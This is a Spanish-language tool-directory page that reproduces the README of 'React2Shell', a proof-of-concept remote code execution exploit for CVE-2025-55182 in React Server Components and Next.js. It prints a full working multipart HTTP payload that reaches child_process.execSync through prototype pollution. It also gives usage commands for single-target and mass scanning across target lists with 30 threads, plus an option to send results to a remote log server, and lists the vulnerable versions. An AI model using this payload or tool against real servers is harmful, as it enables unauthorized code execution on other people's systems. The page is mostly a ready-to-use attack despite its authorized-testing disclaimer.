Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
React2Shell-Exploit-CVE-2025-55182 — React2Shell es un exploit de prueba de concepto para CVE-2025-55182 que afecta a implementaciones vulnerables de React Server Components (RSC) en Next.js | Kitploit
Herramientas/GitHubGitHub/indra-031/react2shell-exploit-cve-2025-55182
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónRed Teaming
GitHubindra-031/react2shell-exploit-cve-2025-55182

React2Shell-Exploit-CVE-2025-55182

React2Shell es un exploit de prueba de concepto para CVE-2025-55182 que afecta a implementaciones vulnerables de React Server Components (RSC) en Next.js

Ver Repositorio
19hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

💀 Exploit React2Shell — CVE-2025-55182

██████╗ ███████╗ █████╗  ██████╗████████╗██████╗ ███████╗██╗  ██╗███████╗██╗     ██╗
██╔══██╗██╔════╝██╔══██╗██╔════╝╚══██╔══╝╚════██╗██╔════╝██║  ██║██╔════╝██║     ██║
██████╔╝█████╗  ███████║██║        ██║    █████╔╝███████╗███████║█████╗  ██║     ██║
██╔══██╗██╔══╝  ██╔══██║██║        ██║   ██╔═══╝ ╚════██║██╔══██║██╔══╝  ██║     ██║
██║  ██║███████╗██║  ██║╚██████╗   ██║   ███████╗███████║██║  ██║███████╗███████╗███████╗
╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝ ╚═════╝   ╚═╝   ╚══════╝╚══════╝╚═╝  ╚═╝╚══════╝╚══════╝╚══════╝

🔥 Ejecución Remota de Código en React Server Components

CVE-2025-55182

Escrito por INDRA


⚠️ Descargo de Responsabilidad

Este proyecto se proporciona únicamente con fines educativos, de investigación de seguridad y pruebas de penetración autorizadas.

El autor no asume ninguna responsabilidad por el mal uso o los daños causados por este software.

Utilice este exploit únicamente contra sistemas que posea o para los que tenga permiso explícito de prueba.


📖 Descripción

React2Shell es un exploit de prueba de concepto para CVE-2025-55182 que afecta a implementaciones vulnerables de React Server Components (RSC) en Next.js.

El exploit envía una solicitud multipart manipulada que abusa del flujo vulnerable de deserialización y extrae la salida de comandos a través de la respuesta de digest de redirección de la aplicación.

Cuando tiene éxito, el exploit muestra directamente en la terminal la salida del comando ejecutado.


✨ Características

  • 🚀 Modo de objetivo único
  • 🌍 Modo de escaneo masivo
  • 🔄 Detección automática de HTTP y HTTPS
  • ⚡ Ejecución multihilo
  • 📝 Registro local opcional
  • 🌐 Servidor de registro remoto opcional
  • 🎯 Salida limpia
  • 🛡 Verificación SSL deshabilitada (para entornos de prueba)
  • 📂 Eliminación de objetivos duplicados

📦 Requisitos

Python 3.8+

Instalar dependencias:

pip install requests urllib3

📁 Estructura del Proyecto

.
├── exploit.py
└── README.md

🔥 Versiones Vulnerables

React

VersiónEstado
19.0⚠ Vulnerable
19.1.0⚠ Vulnerable
19.1.1⚠ Vulnerable
19.2.0⚠ Vulnerable
19.0.1✅ Parcheada
19.1.2✅ Parcheada
19.2.1✅ Parcheada

Next.js

Vulnerables

  • 14.3.0-canary.77 y posteriores
  • 15.x
  • 16.x

Parcheadas

  • 15.0.5
  • 15.1.9
  • 15.2.6
  • 16.0.7

📨 Solicitud HTTP Utilizada

POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]

------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

🚀 Uso

Mostrar Ayuda

python exploit.py -h

Escanear Un Objetivo

python exploit.py -u https://target.com

Escanear Múltiples Objetivos

targets.txt

target1.com
target2.com
target3.com

Ejecutar

python exploit.py -f targets.txt

Guardar Resultados

python exploit.py -u https://target.com -o results.txt

Enviar Resultados al Servidor de Registro Remoto

python exploit.py -u https://target.com -l https://your-log-server.com

Todo Junto

python exploit.py -f targets.txt -o results.txt -l https://your-log-server.com

📋 Opciones de Línea de Comandos

OpciónDescripción
-uURL del objetivo
-fArchivo que contiene los dominios objetivo
-oGuardar objetivos vulnerables localmente
-lEnviar resultados al servidor de registro remoto
-hMostrar ayuda

🖥 Salida de Ejemplo

🚀 Loaded 42 targets (HTTP + HTTPS)

🔥 [VULNERABLE] https://target.com/

💀 Command Output →
uid=1000(node) gid=1000(node) groups=1000(node)

──────────────────────────────────────────────

⚙️ Cómo Funciona

  1. Lee los objetivos
  2. Genera automáticamente URLs HTTP y HTTPS
  3. Envía una solicitud multipart manipulada
  4. Analiza el digest de redirección
  5. Extrae la salida del comando
  6. Muestra la explotación exitosa
  7. Opcionalmente, almacena los resultados de forma local o remota

📌 Notas

  • Prueba automáticamente HTTP y HTTPS cuando no se proporciona un esquema.
  • Los objetivos duplicados se eliminan automáticamente.
  • Usa 30 hilos concurrentes.
  • Ignora los certificados SSL no válidos.
  • El tiempo de espera (timeout) está configurado en 10 segundos.

❤️ Créditos

  • Desarrollo del Exploit: INDRA
  • CVE: CVE-2025-55182

⚖️ Aviso Legal

El uso no autorizado de este software contra sistemas sin permiso puede violar leyes locales, nacionales o internacionales.

El autor no es responsable de ningún mal uso.


⭐ Si este proyecto ayudó en tu investigación, considera darle una estrella.

Feliz caza 🕷️

Descargar herramienta